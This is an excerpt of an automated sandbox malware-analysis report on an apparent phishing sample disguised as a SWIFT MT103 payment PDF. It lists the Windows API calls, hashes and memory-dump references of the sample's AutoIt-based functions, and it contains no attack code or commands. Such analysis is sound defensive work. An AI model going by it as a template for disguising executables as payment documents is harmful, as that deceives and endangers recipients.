                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 1078558bf46ea8e9d5a5ebbc8217149972049bb4542e2b29259afb8b4d43f883
                                                        • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                        • Opcode Fuzzy Hash: 1078558bf46ea8e9d5a5ebbc8217149972049bb4542e2b29259afb8b4d43f883
                                                        • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                        APIs
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                        • GetWindowRect.USER32(?,?), ref: 004701EA
                                                        • GetClientRect.USER32(?,?), ref: 004701FA
                                                        • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                        • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                        • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                        • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                        • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                        • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                        • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                        • GetClientRect.USER32(?,?), ref: 00470371
                                                        • GetStockObject.GDI32(00000011), ref: 00470391
                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                        • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 867697134-248962490
                                                        • Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                        • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                        • Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                        • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                        APIs
                                                        • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window
                                                        • String ID: 0
                                                        • API String ID: 2353593579-4108050209
                                                        • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                        • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                        • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                        • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                        APIs
                                                        • GetSysColor.USER32 ref: 0044A11D
                                                        • GetClientRect.USER32(?,?), ref: 0044A18D
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                        • GetWindowDC.USER32(?), ref: 0044A1B3
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                        • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                        • GetSysColor.USER32(0000000F), ref: 0044A216
                                                        • GetSysColor.USER32(00000005), ref: 0044A21E
                                                        • GetWindowDC.USER32 ref: 0044A277
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                        • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                        • GetStockObject.GDI32(00000005), ref: 0044A312
                                                        • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                        • String ID:
                                                        • API String ID: 1744303182-0
                                                        • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                        • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                        • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                        • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$__wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 790654849-1810252412
                                                        • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                        • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                        • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                        • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: InitVariant
                                                        • String ID:
                                                        • API String ID: 1927566239-0
                                                        • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                        • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                        • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                        • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                        APIs
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                        • GetForegroundWindow.USER32 ref: 0046DBA4
                                                        • IsWindow.USER32(?), ref: 0046DBDE
                                                        • GetDesktopWindow.USER32 ref: 0046DCB5
                                                        • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                        • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                          • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                        • API String ID: 1322021666-1919597938
                                                        • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                        • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                        • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                        • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                        • _wcsncpy.LIBCMT ref: 0045DF0F
                                                        • __wsplitpath.LIBCMT ref: 0045DF54
                                                        • _wcscat.LIBCMT ref: 0045DF6C
                                                        • _wcscat.LIBCMT ref: 0045DF7E
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                        • _wcscpy.LIBCMT ref: 0045E019
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                        • String ID: *.*
                                                        • API String ID: 3201719729-438819550
                                                        • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                        • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                        • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                        • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2485277191-404129466
                                                        • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                        • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                        • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                        • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                        APIs
                                                        • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                        • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                        • strncnt.LIBCMT ref: 00428646
                                                        • strncnt.LIBCMT ref: 0042865A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: strncnt$CompareErrorLastString
                                                        • String ID:
                                                        • API String ID: 1776594460-0
                                                        • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                        • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                        • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                        • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                        APIs
                                                        • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                        • SetWindowTextW.USER32(?,?), ref: 00454606
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                        • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                        • GetWindowRect.USER32(?,?), ref: 00454688
                                                        • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                        • GetDesktopWindow.USER32 ref: 00454708
                                                        • GetWindowRect.USER32(00000000), ref: 0045470F
                                                        • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                        • GetClientRect.USER32(?,?), ref: 0045476F
                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                        • String ID:
                                                        • API String ID: 3869813825-0
                                                        • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                        • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                        • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                        • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                        • GetCursorInfo.USER32 ref: 00458E03
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                        • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                        • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                        • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                        APIs
                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                        • GetFocus.USER32 ref: 004696E0
                                                        • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$CtrlFocus
                                                        • String ID: 0
                                                        • API String ID: 1534620443-4108050209
                                                        • Opcode ID: 8ea49681bd39dccbbbcb4e36da66acc7c10ee4f09da68c512d98634fe9205ff7
                                                        • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                        • Opcode Fuzzy Hash: 8ea49681bd39dccbbbcb4e36da66acc7c10ee4f09da68c512d98634fe9205ff7
                                                        • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                        APIs
                                                        • _memset.LIBCMT ref: 00468107
                                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                        • GetMenuItemCount.USER32(?), ref: 00468227
                                                        • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                        • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                        • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                        • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                        • GetMenuItemCount.USER32 ref: 004682DC
                                                        • SetMenuItemInfoW.USER32 ref: 00468317
                                                        • GetCursorPos.USER32(00000000), ref: 00468322
                                                        • SetForegroundWindow.USER32(?), ref: 0046832D
                                                        • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 3993528054-4108050209
                                                        • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                        • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                        • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                        • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                        APIs
                                                        • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                          • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                          • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                          • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                        • SendMessageW.USER32(?), ref: 0046F34C
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
